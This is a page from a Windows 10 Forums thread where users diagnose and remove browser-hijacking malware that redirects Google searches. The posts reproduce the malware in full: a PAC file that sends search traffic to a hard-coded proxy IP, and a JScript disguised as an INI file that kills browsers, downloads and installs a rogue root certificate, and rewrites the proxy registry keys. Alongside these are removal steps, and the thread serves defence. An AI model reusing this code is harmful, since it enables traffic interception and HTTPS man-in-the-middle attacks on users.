Page 11 of 12 FirstFirst ... 9101112 LastLast
  1.    08 Jan 2016 #101
    Join Date : Dec 2015
    Posts : 5
    WIN 7

    Something quite strange was detected in the registry.

    Even after I've successfully removed all the main causes of this Maleware, it seems that some remnants of it remained in my registry. Here is what I've found (when searching for keys containg the word 'localhost.world' or 'localhost' or '.world')

    [ note - do NOT activate the attached *.reg ]
    Attached Thumbnails Attached Thumbnails localhost.world - registry key.jpg  
    Google redirection localhost.world Attached Files
      My ComputerSystem Spec
  2.    08 Jan 2016 #102
    Join Date : Jan 2016
    The Netherlands
    Posts : 11
    Windows 7 and 10

    this is nothing you have to worry about.. the value is in your registry because you have opened the file and it's now in your recent file list (the shortcut to this file actually)
      My ComputerSystem Spec
  3.    01 Feb 2016 #103
    Join Date : Feb 2016
    Posts : 1
    windows 7 ultimate

    Hi i have been having the same problem
    what happens is a "nslookup.exe" runs everyday at 18:00 (GMT+0) and changes my setting to:
    Click image for larger version. 

Name:	Capture1.JPG 
Views:	57 
Size:	37.3 KB 
ID:	61915
    i tried checking the sched but nothing of sort was there

    after downloading the file this is what was on it :

    function FindProxyForURL(url, host) {
    ba = /^https?:\/\/www\.google\.[a-zA-Z.]+\/?$/;if (ba.test(url)) { return "PROXY 69.197.188.122:8484" }
    bb = /^https?:\/\/www\.google\.[a-zA-Z.]+\/\?(.*)$/;if (bb.test(url)) { return "PROXY 69.197.188.122:8484" }
    bc = /^https?:\/\/www\.google\.[a-zA-Z.]+\/search\?(.*)$/;if (bc.test(url)) { return "PROXY 69.197.188.122:8484" }
    bd = /^https?:\/\/www\.google\.[a-zA-Z.]+\/cse\?(.*)$/;if (bd.test(url)) { return "PROXY 69.197.188.122:8484" }
    be = /^https?:\/\/www\.google\.[a-zA-Z.]+\/s\?(.*)$/;if (be.test(url)) { return "PROXY 69.197.188.122:8484" }
    bf = /^https?:\/\/cse\.google\.[a-zA-Z.]+\/cse\?(.*)$/;if (bf.test(url)) { return "PROXY 69.197.188.122:8484" }
    return "DIRECT";
    }
    i'm going to go through the 102 replies looking for a solution, but if anybody got a quick fix it'd be much appreciated

    Tkanks
      My ComputerSystem Spec
  4.    01 Feb 2016 #104
    Join Date : Apr 2015
    Posts : 12,952
    W10Prox64

    Quote Originally Posted by nueru View Post
    Hi i have been having the same problem
    what happens is a "nslookup.exe" runs everyday at 18:00 (GMT+0) and changes my setting to:
    Click image for larger version. 

Name:	Capture1.JPG 
Views:	57 
Size:	37.3 KB 
ID:	61915
    i tried checking the sched but nothing of sort was there

    after downloading the file this is what was on it :

    function FindProxyForURL(url, host) {
    ba = /^https?:\/\/www\.google\.[a-zA-Z.]+\/?$/;if (ba.test(url)) { return "PROXY 69.197.188.122:8484" }
    bb = /^https?:\/\/www\.google\.[a-zA-Z.]+\/\?(.*)$/;if (bb.test(url)) { return "PROXY 69.197.188.122:8484" }
    bc = /^https?:\/\/www\.google\.[a-zA-Z.]+\/search\?(.*)$/;if (bc.test(url)) { return "PROXY 69.197.188.122:8484" }
    bd = /^https?:\/\/www\.google\.[a-zA-Z.]+\/cse\?(.*)$/;if (bd.test(url)) { return "PROXY 69.197.188.122:8484" }
    be = /^https?:\/\/www\.google\.[a-zA-Z.]+\/s\?(.*)$/;if (be.test(url)) { return "PROXY 69.197.188.122:8484" }
    bf = /^https?:\/\/cse\.google\.[a-zA-Z.]+\/cse\?(.*)$/;if (bf.test(url)) { return "PROXY 69.197.188.122:8484" }
    return "DIRECT";
    }
    i'm going to go through the 102 replies looking for a solution, but if anybody got a quick fix it'd be much appreciated

    Tkanks
    Hi.
    Please read the post #36 here. It should point you in the right direction.
      My ComputerSystem Spec
  5.    12 Apr 2016 #105
    Join Date : Apr 2016
    Posts : 1
    Windows 10

    Quote Originally Posted by moraleja39 View Post
    Here are all the things I had to wipe:

    • The scheduled task. Its name was "Adobe Acrobat Pro DC Update". You can open the task scheduler writing taskschd.msc on the start menu search bar and hitting enter.
    • A file named "settings.ini" located on %APPDATA%\Adobe Acrobat Pro DC". Full path could be "C:\Users\[username]\AppData\Roaming\Adobe Acrobat Pro DC\settings.ini".
    • In my case, two fake certificates. Open the certificate manager writing certmgr.msc on the start menu and hitting enter. The certificates are named "DO_NOT_TRUST_FiddlerRoot" and are under the folder "trusted root CAs" (or however it is in English)
    • Registry changes used to force proxy usage. In my case, I totally deleted the following values:
      • HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
      • HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
      • HKCU\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableAutoProxyResultCache

    • Just in case it is still enabled, disable the proxy. Go to control panel, internet settings, connections, LAN settings, and disable all checkboxes.


    I also will attach the removed INI and certificate files, just in case they could be of use to anybody reading this, as they are not dangerous per se.
    thats not enough
    im amazed that you havnt posted anthing after this about how this comes back after a few days

    to solve this crap for good you need to BLOCK the IP adress from this Localhost.world
    if you dont it will come back even if you delete this stuff.

    Block IP 69.197.188.122 from your firewall and you can forget this for good
      My ComputerSystem Spec
  6.    09 Nov 2016 #106
    Join Date : Nov 2016
    Posts : 6
    Windows 10

    Quote Originally Posted by moraleja39 View Post
    Hey. I've been struggling with this problem for a while, and I think I just solved it. However, I assure that this malware was undetected by all the many tools I scanned my PC with, so it may require some review by, I don't know, the guys who write those tools.

    Here we go: I noticed that Chrome getting closed and that cmd window that flashed happened always at 18:00, so searched in the task scheduler. Bingo:

    Attachment 54678
    (the first one, sorry for it being in Spanish)

    The action for that task is the following:
    Code:
    C:\Windows\system32\wscript.exe //nologo //B //E:jscript "C:\Users\[me]\AppData\Roaming\Adobe Acrobat Pro DC\settings.ini"
    Looking at that ini file, it was indeed a JS file badly disguised as INI. Stripped of all the comments, this are its contents:
    Code:
    var ns, no, re, rs, st, reg, pac;var ws = new ActiveXObject("Wscript.Shell");
    var bs = new ActiveXObject("ADODB.Stream");
    var xh = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
    var tmp = ws.ExpandEnvironmentStrings("%TEMP%");
    try {
      ns = ws.Exec("nslookup -type=txt remotesettings1.mtmyoq.se");
      no = ns.StdOut.ReadAll();
      re = new RegExp('"(.*?)"');
      rs = re.exec(no);
      st = rs[1].split("|");
      pac = st[0];
      cer = st[1];
      try {
        reg = ws.RegRead("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL");
      } catch (e) {
      }
      if (reg != pac) {
        ws.Run("taskkill /f /im iexplore.exe", 0, false);
        ws.Run("taskkill /f /im chrome.exe", 0, false);
        try {
          xh.Open("GET", cer, false);
          xh.Send();
          bs.Type = 1;
          bs.Open();
          bs.Write(xh.ResponseBody);
          bs.SaveToFile(tmp + "\\cert.cer", 2);
          ws.Run("certutil -addstore -f -enterprise -user root " + tmp + "\\cert.cer", 0, false);
          ws.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL", pac, "REG_SZ");
          ws.RegWrite("HKEY_CURRENT_USER\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL", pac, "REG_SZ");
          ws.RegWrite("HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnableAutoProxyResultCache", 0, "REG_DWORD");
        } catch (e$0) {
        }
      }
    } catch (e$1) {
    }
    ;
    Pretty much the behavior we are seeing.

    I can see that it also installs a certificate, probably to make work that fake google through https without raising errors. I can't tell much about the certificate since I am not very well up on the subject. What I can tell is that it was created by Fiddler free web debugging proxy
    , and that it shows on my installed certs as this:

    Attachment 54680
    Well yeah, do not trust.

    Interestingly, there are several domains involved in the malware. The first one, localhost.world from where that smelly proxy settings are pulled from, and mtmyoq.se. This last one, when visited, contains a long string that, when base64 decoded, looks like this:
    Code:
    <Settings>
        <Setting>
            <ida>1122843206</ida>
            <UpdateVer>6.1.7600.20003</UpdateVer>
            <UpdateUrl></UpdateUrl>
            <UpdateType>2</UpdateType>
            <PacUrl>http://searchly.org/router.pac</PacUrl>
            <PacFile>ZnVuY3Rpb24gRmluZFByb3h5Rm9yVVJMKHVybCwgaG9zdCkgeyBpZiAoc2hFeHBNYXRjaChob3N0LCAid3d3Lmdvb2dsZS4qIikpIHJldHVybiAiUFJPWFkgMTI3LjAuMC4xOjgwODAiOyAgcmV0dXJuICJESVJFQ1QiO30=</PacFile>
            <OneIn>1</OneIn>
            <RewriteFrom></RewriteFrom>
            <RewriteTo></RewriteTo>
            <DisableRewrite>0</DisableRewrite>
            <Ping>1</Ping>
            <RedirectType>0</RedirectType>
            <Accounts>
                <Account>
                    <RefUrl>http://www.digital4k.net/search.php?action=results&amp;sid=</RefUrl>
                    <CX>009793234822822480237:wabrdd_t6e8</CX>
                </Account>    
            </Accounts>
        </Setting>
    </Settings>
    I couldn't tell what that part is but it involves more domains. What is clear is that this is obviously malware, probably an attemp of phising. And none of those domains or IPs are blocked by my security software (ESET Smart Security) or seem to be blacklisted anywhere. This is not ok.

    Oh I almost forgot. To get rid of it, just delete the task, the .ini file, all the "DO_NOT_TRUST" certificates and revert the registry changes made. Ensure that there is not any proxy set.
    I registered an account here to say thank you. This has been bothering me for MONTHS and I have not been able to find ANY information on it, I have tried so many different anti-virus and anti-malware programs that have found nothing. I cannot thank you enough for saving me from having to reformat because of this. I wish I knew how we could share this with a large group of people because this is a bigger problem than I think many realize. I am changing all my passwords - I hate to think what might have been compromised
      My ComputerSystem Spec
  7.    10 Nov 2016 #107
    Join Date : Apr 2015
    Posts : 12,952
    W10Prox64

    Quote Originally Posted by korbinperry View Post
    I registered an account here to say thank you. This has been bothering me for MONTHS and I have not been able to find ANY information on it, I have tried so many different anti-virus and anti-malware programs that have found nothing. I cannot thank you enough for saving me from having to reformat because of this. I wish I knew how we could share this with a large group of people because this is a bigger problem than I think many realize. I am changing all my passwords - I hate to think what might have been compromised
    Hi korbinperry and welcome to Tenforums. Glad this was able to help you. Thanks for registering to let us know this worked for you as well.
      My ComputerSystem Spec
  8.    10 Nov 2016 #108
    Join Date : Nov 2016
    Posts : 6
    Windows 10

    Quote Originally Posted by simrick View Post
    Hi korbinperry and welcome to Tenforums. Glad this was able to help you. Thanks for registering to let us know this worked for you as well.
    Absolutely!

    I actually have a question maybe you can help... So for the most part this eliminated my problem. Mine was slightly different, and for the sake of transparency I'll share...mine wasn't coming from a false adobe updater it came from a modified version of Microsoft toolkit containing autokms. Someone had snuck it in there. I have removed autokms and Mstk for all I can tell now and am genuine. My question is, I still see something trying to make an outbound connection. My malwarebytes keeps picking up an outbound attempt at that IP we were all having issues with, various ports, leading to svchost.exe. Not a fake svchost, the real deal. Any ideas how I could see what's causing this?
      My ComputerSystem Spec
  9.    10 Nov 2016 #109
    Join Date : Apr 2015
    Posts : 12,952
    W10Prox64

    Quote Originally Posted by korbinperry View Post
    Absolutely!

    I actually have a question maybe you can help... So for the most part this eliminated my problem. Mine was slightly different, and for the sake of transparency I'll share...mine wasn't coming from a false adobe updater it came from a modified version of Microsoft toolkit containing autokms. Someone had snuck it in there. I have removed autokms and Mstk for all I can tell now and am genuine. My question is, I still see something trying to make an outbound connection. My malwarebytes keeps picking up an outbound attempt at that IP we were all having issues with, various ports, leading to svchost.exe. Not a fake svchost, the real deal. Any ideas how I could see what's causing this?
    hmmm.....can you try using process explorer and maybe following the PIDs? Also, GlassWire may shed some light on things.
      My ComputerSystem Spec
  10.    10 Nov 2016 #110
    Join Date : Nov 2016
    Posts : 6
    Windows 10

    Quote Originally Posted by simrick View Post
    hmmm.....can you try using process explorer and maybe following the PIDs? Also, GlassWire may shed some light on things.
    Good idea.. I'll report back anything I find in case it can help someone else! Thank you again!
      My ComputerSystem Spec

 
Page 11 of 12 FirstFirst ... 9101112 LastLast


Similar Threads
Thread Forum
Solved Edge browser can't access LOCALHOST type of IP addresses (build 10122
Hi there same problem with EDGE (the new browser) - can't access localhost type of addresses. I use several media servers with Web interface for controls etc. Get around - use loopback adapter -- but why should I -- Chrome / FF / IE all work...
Browsers and Email
Solved Dont forget EDGE CAN access Localhost type IP addresses now
Hi there Edge has been modified so you CAN set it to access local host type of sites (at least in build 10240). This was mentioned a while ago but just as a reminder -- many people have servers etc that have a web interface with a localhost or...
Installation and Upgrade
Why is Edge only offering google.fr as an option, not google.co.uk?
Hi, I've just installed windows 10 which all seems to have gone very well. The only problem I can't currently fix is that google seems to think I am in France! When I go to Edge/Settings/Advanced settings/search in the address bar with the only...
Browsers and Email
Windows 10 Hyper-V stop work | fail to connect do localhost
:sick: Hi, since yesterday my Hyper-V stoped work. I have no clue of whats going on. I tried to uninstall and install it again, but didn't work. Does someone knows how to purge hyper-v configuration when remove/uninstall it? Because it seems...
Virtualization
Loopback/localhost acces in apps
This is aimed at Win 8, but should be the same for 10 As some of us have found out, modern apps such as Edge are not allowed to send network traffic to the local host, so things like media servers and routers do not work I have just been...
Software and Apps
Our Sites
Site Links
About Us
Windows 10 Forums is an independent web site and has not been authorized, sponsored, or otherwise approved by Microsoft Corporation. "Windows 10" and related materials are trademarks of Microsoft Corp.

© Designer Media Ltd
All times are GMT -5. The time now is 12:29.
Find Us
Twitter Facebook Google+ Ten Forums iOS App Ten Forums Android App



Windows 10 Forums